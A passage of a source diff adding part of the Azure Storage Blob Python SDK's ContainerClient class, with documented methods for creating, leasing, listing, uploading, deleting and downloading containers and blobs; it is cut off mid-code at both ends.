conn_str: + A connection string to an Azure Storage account. + :param container_name: + The container name for the blob. + :type container_name: str + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token, or the connection string already has shared + access key values. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account shared access + key, or an instance of a TokenCredentials class from azure.identity. + Credentials provided here will take precedence over those in the connection string. + :returns: A container client. + :rtype: ~azure.storage.blob.ContainerClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_authentication.py + :start-after: [START auth_from_connection_string_container] + :end-before: [END auth_from_connection_string_container] + :language: python + :dedent: 8 + :caption: Creating the ContainerClient from a connection string. + """ + account_url, secondary, credential = parse_connection_str(conn_str, credential, 'blob') + if 'secondary_hostname' not in kwargs: + kwargs['secondary_hostname'] = secondary + return cls( + account_url, container_name=container_name, credential=credential, **kwargs) + + @distributed_trace + def create_container(self, metadata=None, public_access=None, **kwargs): + # type: (Optional[Dict[str, str]], Optional[Union[PublicAccess, str]], **Any) -> Dict[str, Union[str, datetime]] + """ + Creates a new container under the specified account. If the container + with the same name already exists, the operation fails. + + :param metadata: + A dict with name_value pairs to associate with the + container as metadata. Example:{'Category':'test'} + :type metadata: dict[str, str] + :param ~azure.storage.blob.PublicAccess public_access: + Possible values include: 'container', 'blob'. + :keyword container_encryption_scope: + Specifies the default encryption scope to set on the container and use for + all future writes. + + .. versionadded:: 12.2.0 + + :paramtype container_encryption_scope: dict or ~azure.storage.blob.ContainerEncryptionScope + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: A dictionary of response headers. + :rtype: Dict[str, Union[str, datetime]] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START create_container] + :end-before: [END create_container] + :language: python + :dedent: 12 + :caption: Creating a container to store blobs. + """ + headers = kwargs.pop('headers', {}) + timeout = kwargs.pop('timeout', None) + headers.update(add_metadata_headers(metadata)) # type: ignore + container_cpk_scope_info = get_container_cpk_scope_info(kwargs) + try: + return self._client.container.create( # type: ignore + timeout=timeout, + access=public_access, + container_cpk_scope_info=container_cpk_scope_info, + cls=return_response_headers, + headers=headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def _rename_container(self, new_name, **kwargs): + # type: (str, **Any) -> ContainerClient + """Renames a container. + + Operation is successful only if the source container exists. + + :param str new_name: + The new container name the user wants to rename to. + :keyword lease: + Specify this to perform only if the lease ID given + matches the active lease ID of the source container. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: ~azure.storage.blob.ContainerClient + """ + lease = kwargs.pop('lease', None) + try: + kwargs['source_lease_id'] = lease.id # type: str + except AttributeError: + kwargs['source_lease_id'] = lease + try: + renamed_container = ContainerClient( + "{}://{}".format(self.scheme, self.primary_hostname), container_name=new_name, + credential=self.credential, api_version=self.api_version, _configuration=self._config, + _pipeline=self._pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) + renamed_container._client.container.rename(self.container_name, **kwargs) # pylint: disable = protected-access + return renamed_container + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def delete_container( + self, **kwargs): + # type: (Any) -> None + """ + Marks the specified container for deletion. The container and any blobs + contained within it are later deleted during garbage collection. + + :keyword lease: + If specified, delete_container only succeeds if the + container's lease is active and matches this ID. + Required if the container has an active lease. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START delete_container] + :end-before: [END delete_container] + :language: python + :dedent: 12 + :caption: Delete a container. + """ + lease = kwargs.pop('lease', None) + access_conditions = get_access_conditions(lease) + mod_conditions = get_modify_conditions(kwargs) + timeout = kwargs.pop('timeout', None) + try: + self._client.container.delete( + timeout=timeout, + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def acquire_lease( + self, lease_duration=-1, # type: int + lease_id=None, # type: Optional[str] + **kwargs): + # type: (...) -> BlobLeaseClient + """ + Requests a new lease. If the container does not have an active lease, + the Blob service creates a lease on the container and returns a new + lease ID. + + :param int lease_duration: + Specifies the duration of the lease, in seconds, or negative one + (-1) for a lease that never expires. A non-infinite lease can be + between 15 and 60 seconds. A lease duration cannot be changed + using renew or change. Default is -1 (infinite lease). + :param str lease_id: + Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: A BlobLeaseClient object, that can be run in a context manager. + :rtype: ~azure.storage.blob.BlobLeaseClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START acquire_lease_on_container] + :end-before: [END acquire_lease_on_container] + :language: python + :dedent: 8 + :caption: Acquiring a lease on the container. + """ + lease = BlobLeaseClient(self, lease_id=lease_id) # type: ignore + kwargs.setdefault('merge_span', True) + timeout = kwargs.pop('timeout', None) + lease.acquire(lease_duration=lease_duration, timeout=timeout, **kwargs) + return lease + + @distributed_trace + def get_account_information(self, **kwargs): + # type: (**Any) -> Dict[str, str] + """Gets information related to the storage account. + + The information can also be retrieved if the user has a SAS to a container or blob. + The keys in the returned dictionary include 'sku_name' and 'account_kind'. + + :returns: A dict of account information (SKU and account type). + :rtype: dict(str, str) + """ + try: + return self._client.container.get_account_info(cls=return_response_headers, **kwargs) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def get_container_properties(self, **kwargs): + # type: (Any) -> ContainerProperties + """Returns all user-defined metadata and system properties for the specified + container. The data returned does not include the container's list of blobs. + + :keyword lease: + If specified, get_container_properties only succeeds if the + container's lease is active and matches this ID. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: Properties for the specified container within a container object. + :rtype: ~azure.storage.blob.ContainerProperties + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START get_container_properties] + :end-before: [END get_container_properties] + :language: python + :dedent: 12 + :caption: Getting properties on the container. + """ + lease = kwargs.pop('lease', None) + access_conditions = get_access_conditions(lease) + timeout = kwargs.pop('timeout', None) + try: + response = self._client.container.get_properties( + timeout=timeout, + lease_access_conditions=access_conditions, + cls=deserialize_container_properties, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + response.name = self.container_name + return response # type: ignore + + @distributed_trace + def exists(self, **kwargs): + # type: (**Any) -> bool + """ + Returns True if a container exists and returns False otherwise. + + :kwarg int timeout: + The timeout parameter is expressed in seconds. + :returns: boolean + """ + try: + self._client.container.get_properties(**kwargs) + return True + except HttpResponseError as error: + try: + process_storage_error(error) + except ResourceNotFoundError: + return False + + @distributed_trace + def set_container_metadata( # type: ignore + self, metadata=None, # type: Optional[Dict[str, str]] + **kwargs + ): + # type: (...) -> Dict[str, Union[str, datetime]] + """Sets one or more user-defined name-value pairs for the specified + container. Each call to this operation replaces all existing metadata + attached to the container. To remove all metadata from the container, + call this operation with no metadata dict. + + :param metadata: + A dict containing name-value pairs to associate with the container as + metadata. Example: {'category':'test'} + :type metadata: dict[str, str] + :keyword lease: + If specified, set_container_metadata only succeeds if the + container's lease is active and matches this ID. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Container-updated property dict (Etag and last modified). + :rtype: dict[str, str or datetime] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START set_container_metadata] + :end-before: [END set_container_metadata] + :language: python + :dedent: 12 + :caption: Setting metadata on the container. + """ + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) + lease = kwargs.pop('lease', None) + access_conditions = get_access_conditions(lease) + mod_conditions = get_modify_conditions(kwargs) + timeout = kwargs.pop('timeout', None) + try: + return self._client.container.set_metadata( # type: ignore + timeout=timeout, + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + cls=return_response_headers, + headers=headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def _get_blob_service_client(self): # pylint: disable=client-method-missing-kwargs + # type: (...) -> BlobServiceClient + """Get a client to interact with the container's parent service account. + + Defaults to current container's credentials. + + :returns: A BlobServiceClient. + :rtype: ~azure.storage.blob.BlobServiceClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service.py + :start-after: [START get_blob_service_client_from_container_client] + :end-before: [END get_blob_service_client_from_container_client] + :language: python + :dedent: 8 + :caption: Get blob service client from container object. + """ + from ._blob_service_client import BlobServiceClient + if not isinstance(self._pipeline._transport, TransportWrapper): # pylint: disable = protected-access + _pipeline = Pipeline( + transport=TransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + else: + _pipeline = self._pipeline # pylint: disable = protected-access + return BlobServiceClient( + "{}://{}".format(self.scheme, self.primary_hostname), + credential=self._raw_credential, api_version=self.api_version, _configuration=self._config, + _location_mode=self._location_mode, _hosts=self._hosts, require_encryption=self.require_encryption, + key_encryption_key=self.key_encryption_key, key_resolver_function=self.key_resolver_function, + _pipeline=_pipeline) + + @distributed_trace + def get_container_access_policy(self, **kwargs): + # type: (Any) -> Dict[str, Any] + """Gets the permissions for the specified container. + The permissions indicate whether container data may be accessed publicly. + + :keyword lease: + If specified, get_container_access_policy only succeeds if the + container's lease is active and matches this ID. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Access policy information in a dict. + :rtype: dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START get_container_access_policy] + :end-before: [END get_container_access_policy] + :language: python + :dedent: 12 + :caption: Getting the access policy on the container. + """ + lease = kwargs.pop('lease', None) + access_conditions = get_access_conditions(lease) + timeout = kwargs.pop('timeout', None) + try: + response, identifiers = self._client.container.get_access_policy( + timeout=timeout, + lease_access_conditions=access_conditions, + cls=return_headers_and_deserialized, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + return { + 'public_access': response.get('blob_public_access'), + 'signed_identifiers': identifiers or [] + } + + @distributed_trace + def set_container_access_policy( + self, signed_identifiers, # type: Dict[str, AccessPolicy] + public_access=None, # type: Optional[Union[str, PublicAccess]] + **kwargs + ): # type: (...) -> Dict[str, Union[str, datetime]] + """Sets the permissions for the specified container or stored access + policies that may be used with Shared Access Signatures. The permissions + indicate whether blobs in a container may be accessed publicly. + + :param signed_identifiers: + A dictionary of access policies to associate with the container. The + dictionary may contain up to 5 elements. An empty dictionary + will clear the access policies set on the service. + :type signed_identifiers: dict[str, ~azure.storage.blob.AccessPolicy] + :param ~azure.storage.blob.PublicAccess public_access: + Possible values include: 'container', 'blob'. + :keyword lease: + Required if the container has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A datetime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified date/time. + :keyword ~datetime.datetime if_unmodified_since: + A datetime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Container-updated property dict (Etag and last modified). + :rtype: dict[str, str or ~datetime.datetime] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START set_container_access_policy] + :end-before: [END set_container_access_policy] + :language: python + :dedent: 12 + :caption: Setting access policy on the container. + """ + if len(signed_identifiers) > 5: + raise ValueError( + 'Too many access policies provided. The server does not support setting ' + 'more than 5 access policies on a single resource.') + identifiers = [] + for key, value in signed_identifiers.items(): + if value: + value.start = serialize_iso(value.start) + value.expiry = serialize_iso(value.expiry) + identifiers.append(SignedIdentifier(id=key, access_policy=value)) # type: ignore + signed_identifiers = identifiers # type: ignore + lease = kwargs.pop('lease', None) + mod_conditions = get_modify_conditions(kwargs) + access_conditions = get_access_conditions(lease) + timeout = kwargs.pop('timeout', None) + try: + return self._client.container.set_access_policy( + container_acl=signed_identifiers or None, + timeout=timeout, + access=public_access, + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def list_blobs(self, name_starts_with=None, include=None, **kwargs): + # type: (Optional[str], Optional[Union[str, List[str]]], **Any) -> ItemPaged[BlobProperties] + """Returns a generator to list the blobs under the specified container. + The generator will lazily follow the continuation tokens returned by + the service. + + :param str name_starts_with: + Filters the results to return only blobs whose names + begin with the specified prefix. + :param list[str] or str include: + Specifies one or more additional datasets to include in the response. + Options include: 'snapshots', 'metadata', 'uncommittedblobs', 'copy', 'deleted', 'deletedwithversions', + 'tags', 'versions', 'immutabilitypolicy', 'legalhold'. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An iterable (auto-paging) response of BlobProperties. + :rtype: ~azure.core.paging.ItemPaged[~azure.storage.blob.BlobProperties] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START list_blobs_in_container] + :end-before: [END list_blobs_in_container] + :language: python + :dedent: 8 + :caption: List the blobs in the container. + """ + if include and not isinstance(include, list): + include = [include] + + results_per_page = kwargs.pop('results_per_page', None) + timeout = kwargs.pop('timeout', None) + command = functools.partial( + self._client.container.list_blob_flat_segment, + include=include, + timeout=timeout, + **kwargs) + return ItemPaged( + command, prefix=name_starts_with, results_per_page=results_per_page, + page_iterator_class=BlobPropertiesPaged) + + @distributed_trace + def walk_blobs( + self, name_starts_with=None, # type: Optional[str] + include=None, # type: Optional[Any] + delimiter="/", # type: str + **kwargs # type: Optional[Any] + ): + # type: (...) -> ItemPaged[BlobProperties] + """Returns a generator to list the blobs under the specified container. + The generator will lazily follow the continuation tokens returned by + the service. This operation will list blobs in accordance with a hierarchy, + as delimited by the specified delimiter character. + + :param str name_starts_with: + Filters the results to return only blobs whose names + begin with the specified prefix. + :param list[str] include: + Specifies one or more additional datasets to include in the response. + Options include: 'snapshots', 'metadata', 'uncommittedblobs', 'copy', 'deleted'. + :param str delimiter: + When the request includes this parameter, the operation returns a BlobPrefix + element in the response body that acts as a placeholder for all blobs whose + names begin with the same substring up to the appearance of the delimiter + character. The delimiter may be a single character or a string. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An iterable (auto-paging) response of BlobProperties. + :rtype: ~azure.core.paging.ItemPaged[~azure.storage.blob.BlobProperties] + """ + if include and not isinstance(include, list): + include = [include] + + results_per_page = kwargs.pop('results_per_page', None) + timeout = kwargs.pop('timeout', None) + command = functools.partial( + self._client.container.list_blob_hierarchy_segment, + delimiter=delimiter, + include=include, + timeout=timeout, + **kwargs) + return BlobPrefix( + command, + prefix=name_starts_with, + results_per_page=results_per_page, + delimiter=delimiter) + + @distributed_trace + def find_blobs_by_tags( + self, filter_expression, # type: str + **kwargs # type: Optional[Any] + ): + # type: (...) -> ItemPaged[FilteredBlob] + """Returns a generator to list the blobs under the specified container whose tags + match the given search expression. + The generator will lazily follow the continuation tokens returned by + the service. + + :param str filter_expression: + The expression to find blobs whose tags matches the specified condition. + eg. "\"yourtagname\"='firsttag' and \"yourtagname2\"='secondtag'" + :keyword int results_per_page: + The max result per page when paginating. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An iterable (auto-paging) response of FilteredBlob. + :rtype: ~azure.core.paging.ItemPaged[~azure.storage.blob.BlobProperties] + """ + results_per_page = kwargs.pop('results_per_page', None) + timeout = kwargs.pop('timeout', None) + command = functools.partial( + self._client.container.filter_blobs, + timeout=timeout, + where=filter_expression, + **kwargs) + return ItemPaged( + command, results_per_page=results_per_page, + page_iterator_class=FilteredBlobPaged) + + @distributed_trace + def upload_blob( + self, name, # type: Union[str, BlobProperties] + data, # type: Union[Iterable[AnyStr], IO[AnyStr]] + blob_type=BlobType.BlockBlob, # type: Union[str, BlobType] + length=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + **kwargs + ): + # type: (...) -> BlobClient + """Creates a new blob from a data source with automatic chunking. + + :param name: The blob with which to interact. If specified, this value will override + a blob value specified in the blob URL. + :type name: str or ~azure.storage.blob.BlobProperties + :param data: The blob data to upload. + :param ~azure.storage.blob.BlobType blob_type: The type of the blob. This can be + either BlockBlob, PageBlob or AppendBlob. The default value is BlockBlob. + :param int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict(str, str) + :keyword bool overwrite: Whether the blob to be uploaded should overwrite the current data. + If True, upload_blob will overwrite the existing data. If set to False, the + operation will fail with ResourceExistsError. The exception to the above is with Append + blob types: if set to False and the data already exists, an error will not be raised + and the data will be appended to the existing blob. If set overwrite=True, then the existing + append blob will be deleted, and a new one created. Defaults to False. + :keyword ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used, because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword lease: + Required if the container has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually. + :keyword ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier: + A standard blob tier value to set the blob to. For this version of the library, + this is only applicable to block blobs on standard storage accounts. + :keyword int maxsize_condition: + Optional conditional header. The max length in bytes permitted for + the append blob. If the Append Block operation would cause the blob + to exceed that limit or if the blob size is already greater than the + value specified in this header, the request will fail with + MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :keyword int max_concurrency: + Maximum number of parallel connections to use when the blob size exceeds + 64MB. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword str encoding: + Defaults to UTF-8. + :keyword progress_hook: + A callback to track the progress of a long running upload. The signature is + function(current: int, total: Optional[int]) where current is the number of bytes transfered + so far, and total is the size of the blob or None if the size is unknown. + :paramtype progress_hook: Callable[[int, Optional[int]], None] + :returns: A BlobClient to interact with the newly uploaded blob. + :rtype: ~azure.storage.blob.BlobClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START upload_blob_to_container] + :end-before: [END upload_blob_to_container] + :language: python + :dedent: 8 + :caption: Upload blob to the container. + """ + blob = self.get_blob_client(name) + kwargs.setdefault('merge_span', True) + timeout = kwargs.pop('timeout', None) + encoding = kwargs.pop('encoding', 'UTF-8') + blob.upload_blob( + data, + blob_type=blob_type, + length=length, + metadata=metadata, + timeout=timeout, + encoding=encoding, + **kwargs + ) + return blob + + @distributed_trace + def delete_blob( + self, blob, # type: Union[str, BlobProperties] + delete_snapshots=None, # type: Optional[str] + **kwargs + ): + # type: (...) -> None + """Marks the specified blob or snapshot for deletion. + + The blob is later deleted during garbage collection. + Note that in order to delete a blob, you must delete all of its + snapshots. You can delete both at the same time with the delete_blob + operation. + + If a delete retention policy is enabled for the service, then this operation soft deletes the blob or snapshot + and retains the blob or snapshot for specified number of days. + After specified number of days, blob's data is removed from the service during garbage collection. + Soft deleted blob or snapshot is accessible through :func:`list_blobs()` specifying `include=["deleted"]` + option. Soft-deleted blob or snapshot can be restored using :func:`~BlobClient.undelete()` + + :param blob: The blob with which to interact. If specified, this value will override + a blob value specified in the blob URL. + :type blob: str or ~azure.storage.blob.BlobProperties + :param str delete_snapshots: + Required if the blob has associated snapshots. Values include: + - "only": Deletes only the blobs snapshots. + - "include": Deletes the blob along with all snapshots. + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to delete. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + """ + blob_client = self.get_blob_client(blob) # type: ignore + kwargs.setdefault('merge_span', True) + timeout = kwargs.pop('timeout', None) + blob_client.delete_blob( # type: ignore + delete_snapshots=delete_snapshots, + timeout=timeout, + **kwargs) + + @distributed_trace + def download_blob(self, blob, offset=None, length=None, **kwargs): + # type: (Union[str, BlobProperties], Optional[int], Optional[int], **Any) -> StorageStreamDownloader + """Downloads a blob to the StorageStreamDownloader. The readall() method must + be used to read all the content or readinto() must be used to download the blob into + a stream. Using chunks() returns an iterator which allows the user to iterate over the content in chunks. + + :param blob: The blob with which to interact. If specified, this value will override + a blob value specified in the blob URL. + :type blob: str or ~azure.storage.blob.BlobProperties + :param int offset: + Start of byte range to use for downloading a section of the blob. + Must be set if length is provided. + :param int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to download. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword lease: + Required if the blob has an active lease. If specified, download_blob only + succeeds if the blob's lease is active and matches this ID. Value can be a + BlobLeaseClient object or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword int max_concurrency: + The number of parallel connections with which to download. + :keyword str encoding: + Encoding to decode the downloaded bytes. Default is None, i.e. no decoding. + :keyword progress_hook: + A callback to track the progress of a long running download. The signature is + function(current: int, total: int) where current is the number of bytes transfered + so far, and total is the total size of the download. + :paramtype progress_hook: Callable[[int, int], None] + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually. + :returns: A streaming object (StorageStreamDownloader) + :rtype: ~azure.storage.blob.StorageStreamDownloader + """ + blob_client = self.get_blob_client(blob) # type: ignore + kwargs.setdefault('merge_span', True) + return blob_client.download_blob(offset=offset, length=length, **kwargs) + + def _generate_delete_blobs_subrequest_options( + self, snapshot=None, + delete_snapshots=None, + lease_access_conditions=None, + modified_access_conditions=None, + **kwargs + ): + """This code is a copy from _generated. + + Once Autorest is able to provide request preparation this code should be removed. + """ + lease_id = None + if lease_access_conditions is not None: + lease_id = lease_access_conditions.lease_id + if_modified_since = None + if modified_access_conditions is not None: + if_modified_since = modified_access_conditions.if_modified_since + if_unmodified_since = None + if modified_access_conditions is not None: + if_unmodified_since = modified_access_conditions.if_unmodified_since + if_match = None + if modified_access_conditions is not None: + if_match = modified_access_conditions.if_match + if_none_match = None + if modified_access_conditions is not None: + if_none_match = modified_access_conditions.if_none_match + if_tags = None + if modified_access_conditions is not None: + if_tags = modified_access_conditions.if_tags + + # Construct parameters + timeout = kwargs.pop('timeout', None) + query_parameters = {} + if snapshot is not None: + query_parameters['snapshot'] = self._client._serialize.query("snapshot", snapshot, 'str') # pylint: disable=protected-access + if timeout is not None: + query_parameters['timeout'] = self._client._serialize.query("timeout", timeout, 'int', minimum=0) # pylint: disable=protected-access + + # Construct headers + header_parameters = {} + if 